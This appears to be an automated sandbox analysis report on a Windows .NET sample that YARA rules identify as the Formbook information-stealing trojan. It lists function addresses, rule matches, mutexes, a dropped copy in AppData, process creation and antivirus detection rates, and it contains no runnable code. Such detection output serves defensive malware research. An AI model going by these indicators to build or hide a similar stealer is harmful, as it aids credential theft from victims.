Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F43F	15_2_04D0F43F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D195C3	15_2_04D195C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CED5B0	15_2_04CED5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07571	15_2_04D07571
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D016CC	15_2_04D016CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C95630	15_2_04C95630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F7B0	15_2_04D0F7B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFF0CC	15_2_04CFF0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C570C0	15_2_04C570C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F0E0	15_2_04D0F0E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D070E9	15_2_04D070E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5B1B0	15_2_04C5B1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C8516C	15_2_04C8516C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C3F172	15_2_04C3F172
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D1B16B	15_2_04D1B16B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6B2C0	15_2_04C6B2C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF12ED	15_2_04CF12ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C552A0	15_2_04C552A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C9739A	15_2_04C9739A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C3D34C	15_2_04C3D34C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0132D	15_2_04D0132D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FCF2	15_2_04D0FCF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC9C32	15_2_04CC9C32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6FDC0	15_2_04C6FDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C53D40	15_2_04C53D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D01D5A	15_2_04D01D5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07D73	15_2_04D07D73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C59EB0	15_2_04C59EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C13FD2	15_2_04C13FD2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C13FD5	15_2_04C13FD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C51F92	15_2_04C51F92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FFB1	15_2_04D0FFB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FF09	15_2_04D0FF09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C538E0	15_2_04C538E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CBD800	15_2_04CBD800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C59950	15_2_04C59950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6B950	15_2_04C6B950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CE5910	15_2_04CE5910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFDAC6	15_2_04CFDAC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CEDAAC	15_2_04CEDAAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C95AA0	15_2_04C95AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF1AA3	15_2_04CF1AA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07A46	15_2_04D07A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FA49	15_2_04D0FA49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC3A6C	15_2_04CC3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C8DBF9	15_2_04C8DBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC5BF0	15_2_04CC5BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6FB80	15_2_04C6FB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FB76	15_2_04D0FB76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6D7FE	15_2_02B6D7FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6E53C	15_2_02B6E53C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B59E60	15_2_02B59E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52FB0	15_2_02B52FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52D90	15_2_02B52D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52D89	15_2_02B52D89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA036	15_2_04AAA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAE5CD	15_2_04AAE5CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA2D02	15_2_04AA2D02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA1082	15_2_04AA1082
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA8912	15_2_04AA8912
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAB232	15_2_04AAB232
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA5B32	15_2_04AA5B32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA5B30	15_2_04AA5B30

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 012BEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01285130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 011AEA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 012CF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01297E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0123B970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01187E54 appears 97 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04CCF290 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C3B970 appears 280 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C85130 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04CBEA12 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C97E54 appears 111 times

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158150951.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2162617003.00000000070D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2156300043.000000000105E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2162157198.00000000057D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158917960.0000000003F7E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Binary or memory string: OriginalFilenamedKJy.exe: vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: RegSvcs.exe PID: 5224, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 3236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KfYvtUBOq.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@296/11@13/3

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00723C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

15_2_00723C66

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_0072205A CoCreateInstance,

15_2_0072205A

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Mutant created: \Sessions\1\BaseNamedObjects\FuBOvzWrVeorQDb
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Local\Temp\tmp89CA.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: WLDP.DLL		15_2_00724136
Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: localserver		15_2_00724136

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Virustotal: Detection: 24%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Jump to behavior

